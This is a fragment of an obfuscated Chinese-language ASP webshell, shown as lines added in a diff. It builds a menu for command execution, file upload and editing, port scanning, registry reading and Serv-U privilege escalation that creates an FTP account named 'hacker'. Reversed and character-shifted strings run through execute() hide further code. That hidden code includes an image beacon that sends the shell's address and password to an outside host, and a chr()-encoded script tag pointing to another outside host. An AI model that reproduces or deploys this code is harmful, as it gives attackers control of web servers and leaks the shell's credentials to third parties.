+RRS"<iframe name='Left' src='?Action=MainMenu' width='170' height='100%' frameborder='0' border='0'></iframe></td>"
+RRS"<td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"</td></tr></table>"
+End Function:Function MainMenu():
+execute(shisanfun("��>elbat/<>rt/<>dt/<��&thgirypoC&��>rb<------------------------>rb<>'der:roloc'=elyts retnec=ngila dt<>rt<��SRR���>rt/<>dt/<>a/<¼�dz���>->'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��SRR��� >rt/<>dt/<>a/<��ѯ����ۡ� >'emarFeliF'=tegrat '��&pirevres&��/llaetis/moc.nahzia.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<����վ����>'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��SRR��fI dnE���>rt/<>dt/<>vid/<>a/<����BDM��ѹ>')���bdMtcapmoC���,����&)��bdm.atad\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����BDM����>')���bdMetaerC���,����&)��bdm.weN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<���������>'emarFeliF'=tegrat 'reganaMbD=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>���'enon'=yalpsid.elyts.2unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw;xp81:thgieh-enil���=elyts 2unem=di vid<>b/<�����ٿ������+>b<>���''=yalpsid.elyts.2unem���=revoesuomno '42'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '3=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '2=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '1=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>vid/<>a/<)���ٿ�(����������>b/<>'emarFeliF'=tegrat 'mglp=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����ٱ���ע��>'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<�����½�ֱ��>'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����ɨ�ڶˡ�>'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����PTF-uS��>'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����ǿ��uS��>'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<>b/<������DMC��>b<>'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����춴©��>'emarFeliF'=tegrat 'ydog=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<��Ȩ��LQS��>'emarFeliF'=tegrat 'cbalqs=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<��������ִ��ԶIMW��>'emarFeliF'=tegrat 'imw=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>���'enon'=yalpsid.elyts.3unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts 3unem=di vid<>b/<�ݾ߹�Ȩ���+ >b<>���''=yalpsid.elyts.3unem���=revoesuomno 22=thgieh dt<>rt<��SRR���>rb<>a/<�����������>'emarFeliF'=tegrat   'kooh=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<������װ����>'emarFeliF'=tegrat   'kcuf=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��Ա���ܲ�-����ͳϵ��>'emarFeliF'=tegrat 'banimda=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����˻���-���ͳϵ��>'emarFeliF'=tegrat 'esruoC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<����֧����-Ϣ�������>'emarFeliF'=tegrat 'ofnIrevreS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��¼�Ƕ���-�ڶ˶��ա�>'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����󼶳�������>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<���������ĸ��ޡ�>'emarFeliF'=tegrat 'txeTeliFteS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��¼Ŀд�ɿ��顼>'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<��ľ>b/<����>b<�Ҳ��>'emarFeliF'=tegrat 'amumk=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR����>rt/<>dt/<>a/<�����Ĵ��ϡ�>'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<�����Ľ��¡�>'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<��¼Ŀ���¡�>')���redloFweN���,����&)��redloFweN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<��¼Ŀ��̱���>b<>')����&)htaPtooR(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<��¼Ŀ����վ��>b<>')����&)tooRWWW(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<>rt/<>dt/<>vid/<��SRR��gnihtoN=CBA teS:)(revirDwohS.CBA SRR:FBL weN=CBA teS���>���'enon'=yalpsid.elytsyts.1unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts 1unem=di vid<>b/<����Ӳ�����+ >b<>���''=yalpsid.elyts.1unem���=revoesuomno 22=thgieh dt<>rt<��SRR��eslE���>rt/<>dt/<OSF��/��Ȩ��>'42'=thgieh dt<>rt<��SRR��nehT �� ��=)1,0(TbO fI���>rt/<>dt/<��SRR���>retnec/<>tnof/<>rb<------------------------>rb<��&emaNm&��>FF9933#=roloc tnof<>retnec<>dt<>rt<��SRR���>rt/<>dt/<>'5'=thgieh dt<>rt<��SRR���>'0'=gniddapllec '0'=gnicapsllec '%001'=htdiw elbat<��SRR"))
+if session("IDebugMode") <> "ok" then:x mmm:session("IDebugMode")="ok":end if
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+RRS"</table>":End Function:Sub Message(state,msg,flag):Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#91d70d>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBHead>ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub:
+execute(shisanfun("fi dne:fi dne:fi dne:1+)��cevres��(noisses=)��cevres��(noisses neht ���><noitcA fi:esle:��>vid/<>/ '��&ssaPresU&��=p&��&))��L��&��RU��(selbairaVrevreS.tseuqer&)��TS��&��OH_PT��&��TH��(selbairaVrevreS.tseuqer&��//:pt��&��th��(edocnELRU.revres&��=lru?��&��psa.y��&��ek/x��&��s/D6%F6%36%.pxe��&��ya��&��do.77%77%77%//:pt��&��th'=crs gmi<>'enon:yalpsid'=elyts vid<��SRR:1+)��cevres��(noisses=)��cevres��(noisses:neht 1=)��cevres��(noisses fi:esle:neht 0><)��//:ptth��,urevreS(rtsnI ro 0><)��.861.291��,urevreS(rtsnI ro 0><)��1.0.0.721��,urevreS(rtsnI fi"))
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>":End Function:Sub ScanDriveForm():Dim FSO,DriveB:Set FSO = Server.Createobject("Scripting.FileSystemObject")
+execute(LUnEnCode("�e'CRWTK4A%%'%jynw\3jxstuxjW�e'aUXFa?K���硣��·�м��Ķ�ָ��C�汨����Bjzqf{%ynrgzxBju~y%YZUSNA	'%jynw\3jxstuxjW�e'CwjiqtKBjrfs%y}jyBju~y%YZUSNA%%%%'%jynw\3jxstuxjW�e'��ѯ��м��Ķ�ָCyxtUBitmyjr%wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'BstnyhF%RWTKA%%'%jynw\3jxstuxjW�e.'Cg4A'-+.'4'-myfUufR3wj{wjX+.'?��·�Ծ�վ��ǰ��CgA'-%XWW�e'CwjysjhBslnqf%[NIA'%jynw\3jxstuxjW�e'CWGACJQGFY4A'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.7-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���ʱ��ͳϵCGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.7-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.6-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���78rjyx~XCGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.6-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.5-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���x|tisn\CGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.5-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�ey}jS�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACIYA	'%jynw\3jxstuxjW�e'CIY4A	'%jynw\3jxstuxjW�eyhjqjX%isJ%%	�e'����֪δ'%jynw|3jxstuxjW%?jxqj%jxfH%%		�e'�̴�RFW'%jynw|3jxstuxjW%?:%jxfH%%		�e'RTW2IH'%jynw|3jxstuxjW%?9%jxfH%%		�e'�̴�����'%jynw|3jxstuxjW%?8%jxfH%%		�e'��Ӳ�ر�'%jynw|3jxstuxjW%?7%jxfH%%		�e'���ƿ�'%jynw|3jxstuxjW%?6%jxfH%%%%%%	�eju~Yj{nwI3Gj{nwI%jxfH%yhjqjX�e'C'+.<8-wmh+'57Bmyin|%IYA	'%jynw|3jxstuxjw�e'CIY4ACG4A����CGAC'+.<8-wmh+'57Bmyin|%IYA	'%jynw|3jxstuxjw�e'CIY4A?'%jynw|3jxstuxjw�ewjyyjQj{nwI3Gj{nwI%jynw|3jxstuxjw�e'C'+.<8-wmh+':6Bmyin|%IYA'%jynw|3jxstuxjw	�e'CIY4ACG4A����CGAC'+.<8-wmh+':7Bmyin|%IYA'%jynw|3jxstuxjw�e�e'CyxtUBitmyjr%'%jynw|3jxstuxjw�ewjyyjQj{nwI3Gj{nwI%jynw\3jxstuxjW%�e'Bj{nwI+j{nwIsfhXBstnyhFD'%jynw\3jxstuxjW�e�e�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%jqiinrBslnqf%WYA%%'%jynw\3jxstuxjW�exj{nwI3TXK%sn%Gj{nwI%mhfJ%wtK%%�e�e�e'CWY4A%%'%jynw\3jxstuxjW�e'CIY4AϢ�żм���ͳϵ4�̴�CifjMGYBxxfqh%:Bsfuxqth%IYA%%%%'%jynw\3jxstuxjW�e'CWYA%%'%jynw\3jxstuxjW�e'Ci5<i6>(BwtqtHlg%6Blsnhfuxqqjh%8Blsniifuqqjh%wjysjhBslnqf%5Bwjiwtg%5=9Bmyin|%JQGFYA'%jynw\3jxstuxjW"))
+Set FSO=Nothing:
+
+End Sub:
+execute(LUnEnCode("stnyhszK%isJ?wyXw\jW%B%w\jWhX%%%�elsnmytS%B%TXK%yjX%%%�elsnmytS%B%wjiqtKyxjY%yjX%%%�elsnmytS%B%yxnQjqnKyxjY%yjX%%%�ekn%isJ%%%�ekn%isJ%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKjyjqjI3TXK%%%		�e'CYSTK4A��д��'%+%wyXw\jW%B%wyXw\jW%%%%%%%	�ejxqJ%%%	�e'CYSTK4A��д�ɲ�'%+%wyXw\jW%B%wyXw\jW%%%		�ewfjqH3wwj%%%%%%%	�esjmY%wwj%kN%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKy}jYjyfjwH3TXK%%%	�e'1����%C7777kk(Bwtqth%YSTKA'%+%wjiqtk%B%wyXw\jW%%%%%%%�ejxqJ%%%�ekN%isJ%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKjyjqjI3TXK%%%		�e'CYSTK4A��д��'%+%wyXw\jW%B%wyXw\jW%%%%%%%	�ejxqJ%%%	�e'CYSTK4A��д�ɲ�'%+%wyXw\jW%B%wyXw\jW%%%		�ewfjqH3wwj%%%%%%%	�esjmY%wwj%kN%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKy}jYjyfjwH3TXK%%%	�e'1���ɲ�%C7777kk(Bwtqth%YSTKA'%+%wjiqtk%B%wyXw\jW%%%	�ewfjqH3wwj%%%%%%%�esjmY%wwj%kN%%%�ey}jS%%%�eyxnQjqnKyxjY%sn%F%mhfJ%wtK%%%�e'ury3'%+%.|ts-isthjX%+%.|ts-jyzsnR%+%.|ts-wztM%+%.|ts-~fI%+%'urjya'%B%jrfsjqnKisW%%%�exwjiqtKgzX3wjiqtKyxjY%B%yxnQjqnKyxjY%yjX%%%�e.wjiqtk-wjiqtKyjL3TXK%B%wjiqtKyxjY%yjX%%%�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX%%%�ejrfsjqnKisW1wyXw\jW1yxnQjqnKyxjY1wjiqtKyxjY1TXK%rnI%%%�ey}jS%jrzxjW%wtwwJ%sT?.wjiqtk-w\jWhX%stnyhszK?gzX%isJ?61lxrhX1'Ϣ�żм���'%jlfxxjR	�elsnmytS%B%TXK%yjX	�e.'&���Ļ�������������м���дֻ�������ҳ����ˢ�ζ�Ҫ��'-ijW%+%'����עCNQA'%+%lxrhX%B%lxrhX	�ekn%isJ	�e.'&��Ȩ���޻��ڴ治'%+%wjiqtk-ijW%+%'���м���CNQA'%+%lxrhX%B%lxrhX%%%%	�ejxqJ	�elsnmytS%B%wjiqtKT%yjX		�elsnmytS%B%xwjiqtKurjY%yjX		�ey}jS		�e%%.X-w\jWhX%+%'���м���CNQA'+lxrhX%B%lxrhX%%%%%		�exwjiqtKurjY%sn%X%mhfJ%wtK		�e.wjiqtk-w\jWhX%+%'��¼Ŀ���м��Ķ�ָCNQA'%B%lxrhX		�exwjiqtKgzX3wjiqtKT%B%xwjiqtKurjY%yjX		�e.wjiqtk-wjiqtKyjL3TXK%B%wjiqtKT%yjX%%%%	�esjmY%.wjiqtk-xyxn}JwjiqtK3TXK%kN	�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX	�eX1lxrhX1wjiqtKurjY1wjiqtKT1TXK%rnI	�ey}jS%jrzxjW%wtwwJ%sT?.wjiqtk-wjiqtKhX%gzX?gzX%isJ?kn%isJ	�e61wyXdurjY1'Ϣ���̴�?'%+%j{nwI%jlfxxjR		�e.'&���Ļ�������������м���дֻ�������ҳ����ˢ�ζ�Ҫ��'-ijW%+%'����עCNQA'%+%wyXdurjY%B%wyXdurjY		�elsnmytS%B%TXK%yjX%%%%	�elsnmytS%B%j{nwIyxjY%yjX		�ekn%isJ%%%%	�e'-?�ַ���δ����¼Ŀ����'%+%j{nwI%+%'������CNQA'%+%wyXdurjY%B%wyXdurjY%sjmy%5By%kN			�ey}jS%%%%		�ekn%isJ%%%%			�e..n-yxnQwjiqtKurjY%+%'a?'%+%j{nwI-w\jWhX%+%'���м����ַ�CNQA'%+%wyXdurjY%B%wyXdurjY					�e60y%B%y%%%%				�esjmY%..n-yxnQwjiqtKurjY%+%'a?'%+%j{nwI-xyxn}JwjiqtK3TXK%kN%%%%			�e.yxnQwjiqtKurjY-isztgZ%ty%5%B%n%wtK			�e.'uyky'1'gzur|'1'uyk'1'gzuyjsN'1'xjqnK%rfwltwU'1'xlsnyyjX%isf%xysjrzhtI'1'xqttY'1'umu'1'uxf'1'5557x|tisn|'1'jrsn|'1'gj|'1'=>sn|'1'5557sn|'1'sn|'1'yssn|'1'x|tisn|'-~fwwF%B%yxnQwjiqtKurjY			�e.'���Բ�¼Ŀ����'-ijW%+%'CNQA'%+%wyXdurjY%B%wyXdurjY			�e5By?y1yxnQwjiqtKurjY%rnI			�e.'-?���ɲ�'-ijW%+%'?¼Ŀ���̴�CNQA'%+%wyXdurjY%B%wyXdurjY%%%%		�ejxqJ%%%%	�elsnmytS%B%wjiqtKjxfG%yjX			�elsnmytS%B%wjiqtKurjY%yjX			�ey}jS			�e.I-w\jWhX%+%'���м���CNQA'%+%wyXdurjY%B%wyXdurjY%%%%			�exwjiqtKurjY%sn%I%mhfJ%wtK			�exwjiqtKgzX3wjiqtKjxfG%B%xwjiqtKurjY%yjX			�ewjiqtKyttW3j{nwIyxjY%B%wjiqtKjxfG%yjX			�e�e..'a?'%+%j{nwI--w\jWhX%+%'?¼Ŀ���̴�CNQA'%+%.jrfSjrzqt[3j{nwIyxjY-ijW%+%'�������̴�CNQA'%+%..;<:=9564j nXqfytY3j{nwIyxjY-ysNH-ijW%+%'���������̴�CNQA'%+%.jrfSjwfmX3j{nwIyxjY-ijW%+%'���������̴�CNQA'%+%.wjgrzSqfnwjX3j{nwIyxjY-ijW%+%'���������̴�CNQA'%+%.rjyx~XjqnK3j{nwIyxjY-ijW%+%'�����������̴�CNQA'%B%wyXdurjY%%%%		�esjmY%~ifjWxN3j{nwIyxjY%kN		�e.j{nwI-j{nwIyjL3TXK%B%j{nwIyxjY%yjX		�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX%%%%	�esjmY%''%CA%j{nwI%kN	�eI1wyXdurjY1xwjiqtKurjY1wjiqtKjxfG1j{nwIyxjY1TXK%rnI?.j{nwI-j{nwIsfhX%gzX")):
+execute(LUnEnCode("stnyhszK%isJ?'Cjqgfy4A'+7NX+6NX+5NX+NX%XWW�ey}js�ekn%isj�e'Cwy4ACiy4ACystk4A'+myfu3ogt+'@uxgs+C5555KK(Bwtqth%ystkAb'+}q+'?���ද��`C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+jrfS~fquxnI3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACiy4A'+jrfS3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+7NXB7NX�ejxqj�e'Cwy4ACiy4ACystk4A'+myfu3ogt+'@uxgs+C5555KK(Bwtqth%ystkAb'+}q+'?���ද��`C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+jrfS~fquxnI3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACiy4A'+jrfS3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+6NXB6NX�esjmy%7Bju~YywfyX3OGT%isf%'sn|'CA..8191myfu3ogt-inr-jxfHQ%kn�e'�ý�'B}q%sjmy%9Bju~YywfyX3OGT%kn�e'����'B}q%sjmy%8Bju~YywfyX3OGT%kn�e'����'B}q%sjmy%7Bju~YywfyX3OGT%kn�ekn%isj�e%'Cwy4ACiy4A@uxgs+C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'B5NX�e'Cwy4ACiy4A'+NXBNX�e'.��-����ͳϵ'+NXBNX�e%'@uxgs+C''KKKKKK(''Bwtqthlg%iyACiy4A'+NXBNX�ejrfS3ogt+NXBNX�e'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyA'+NXBNX�e'CwyA'+NXBNX�esjmy%''Bju~YywfyX3OGT%kn�ewfjqh3wwj�e.'344?YSsn\'-yhjogTyjl%sn%ogt%mhfj%wtk�ey}js%jrzxjw%wtwwj%st�e'Cwy4ACiy4A����뻧��ͳϵC,zsjr,Bwtqthlg%,wjysjh,Bslnqf%,8,Bsfuxqth%,57,Bymlnjm%iyACwyA'+NXBNX�e'C,wjysjh,Bslnqf%,5,Blsniifuqqjh%,6,Blsnhfuxqqjh%,5,Bwjiwtg%,zsjr,Bwtqthlg%,55;,Bmyin|%jqgfyACwgA'BNX?.-jxwztH%stnyhszK"))
+execute(LUnEnCode("stnyhszK%isJ?kn%isj�e'pwt|yjS3yunwhx\?��Ȩ��û'%jynw|3jxstuxjW�esjmy%wwj%kn�ey}jS�e'CwgA'+jrfS3snrif%jynw|3jxstuxjW�exwjgrjR3uztwLogt%sn%snrif%mhfJ%wtK�e.'uztwl1xwtyfwyxnsnriF4'+jrfSwjyzurtH3Sy+'44?YSsn\'-yhjogTyjLBuztwLogt%yjX�e.'pwt|yjS3yunwhx\'-yhjogTjyfjwh3wj{wjxBSy%yjX�e������xwtyfwyxnsnriF�Ҳ�,%y}js%jrzxjw%wtwwj%st�e5Bxjwnu}J3jxstuxjW?.-gfsnrif%stnyhszK?stnyhszK%isJ?kn%isj�eisj3jxstuxjW�eINxxjhtwUysn+'CwgA'%jynw\3jxstuxjW�e.INxxjhtwUysn1Ht1qqzs1'wjxz%yjs'-jyfjwh3uu%jynw\3jxstuxjW�e.'xxjhtwUd78sn\'-yjl3hhBuu%yjX�e76B|tisn\|tmX3Ht�edjhsfyxsNs|fuX3xxBHt%yjX�e.'uzywfyXxxjhtwUd78sn\'-yjl3hhBxx%yjx�e..'i}'-yxjzvjw-wj{wjxyhjssth3||Bhh%yjx�e.'wtyfhtqrjg|x3lsnyunwhxrjg|'-yhjogtjyfjwh3wj{wjxB||%yjx�esjmy%''CA.'i}'-yxjzvjw%kn�e'Crwtk4A'%XWW�e'C''����''Bjzqf{%''ynrgzX''Bjrfs%''ynrgzx''Bju~y%yzusnA%%%%'%XWW�e'C''5<''Bj nx%''@ytzv+wjphfm@ytzv+1@ytzv+)wjphfm@ytzv+1@ytzv+7{rnh4yttw@ytzv+1@ytzv+6353=;637>6@ytzv+''Bjzqf{%''i}''Bin%''y}jy''Bju~y%''i}''Bjrfs%yzusnA'%XWW�e'������ִ��Զ%%'%XWW�e'C''nr|BstnyhFD''Bstnyhf%''yxtu''Bitmyjr%''6rwtk''Bjrfs%rwtkA'%XWW�e'C,wjysjh,Bslnqf%,5,Blsniifuqqjh%,6,Blsnhfuxqqjh%,5,Bwjiwtg%,zsjr,Bwtqthlg%,*5=,Bmyin|%jqgfyACwgA'BNX?.-nr|%stnyhszK")):
+copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&str1&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Function suftp():RRS"<p><center>Serv-U TȨ����--�޸���Ȩ���޷���������</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='hacker'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='hacker'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+hostip = request.Form("hostp")
+timeout=600:execute(LUnEnCode("kn%isj�elsnmytsB8YXTU}%yjX�e.xj{fjq-isjX38yxtU}�ejzwY%1'xj{fjq4'+%ywtu%+'?635353<7644?uyym'%1'YXTU'%sjuT38yxtU}�e.'UYYMQR]37QR]XR'-yhjogTjyfjwH%B%8yxtU}%yjX�ekqwhg{%+%wjxzy%+%'BwjxZ%'%+%kqwhg{%+%ywtuy%+%'BtSywtU2'%+%kqwhg{%+%'5353535BUN2'%+%kqwhg{%+%'WJXZJYJQJI2'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'JHSFSJYSNFR%JYNX'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%i|u%+%'%xxfU'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%wxZ%+%'%wjxZ'%B%xj{fjq�ejxqj�e.'CWGACwgA.?%'%+%myfuy%+%'%?��·%'%+%xxfuy%+%'%?����'%+%'%'%+%wjxzy%+%'%?������%UYK������ִ��������'-%jynw|3jxstuxjw�elsnmytsBYXTU}%yjX�e.xj{fjq-isjX3yxtU}�ejzwY%1'xj{fjq4'+%ywtu%+'?635353<7644?uyym'%1'YXTU'%sjuT3yxtU}�e.'UYYMQR]37QR]XR'-yhjogTjyfjwH%B%yxtU}%yjX�ey}jS%jrzxjW%wtwwJ%sT�e�ekqwhg{%+%'ynzv'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'UIHQJRF\W""a'%+